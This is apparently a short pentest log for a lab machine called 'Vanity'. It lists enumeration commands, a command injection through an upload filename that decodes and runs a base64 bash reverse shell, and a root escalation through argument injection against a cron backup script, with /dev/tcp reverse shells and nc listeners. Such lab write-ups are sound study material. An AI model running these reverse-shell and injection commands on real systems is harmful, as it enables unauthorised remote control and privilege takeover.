🧪 Pentest Log: {{date:2025-07-24}}

🔍 Target Information

• Machine Name: Vanity
• IP Address: 192.168.238.234
• Operating System: Linux

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 192.168.238.234 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV 192.168.238.234 -oN tcp_scan_result.txt

nmap -sU --top-ports 100 192.168.238.234 -oN udp_scan_result.txt

Port 80

Web Content Enumeration

gobuster dir -u http://192.168.238.234 -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://192.168.238.234

wpscan -url http://192.168.238.234

dirsearch -u http://192.168.238.234 -r -o dirsearch.txt

Port 873

rsync -rdt rsync://192.168.238.234

cat upload.php

💣 Exploitation / Foothold

Tool / Script Used:

Burpsuite

echo "bash -i >& /dev/tcp/192.168.45.163/443 0>&1" | base64

test.txt; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE2My80NDMgMD4mMQo= | base64 -d | bash


nc -lvnp 443

🧬 Privilege Escalation

👤 Current Access

• User: www-data
• Groups: www-data
• Shell Type: web shell

🔍 Enumeration

Scheduled Tasks:

cat /etc/crontab

found the /opt/backup.sh

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: scheduled tasks abuse
• Target Binary/Service: backup.sh
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

echo "bash -i >& /dev/tcp/192.168.45.163/4444 0>&1" > shell.sh

touch '/var/www/html/uploads/-e bash shell.sh'

• Smash to root

nc -lvnp 4444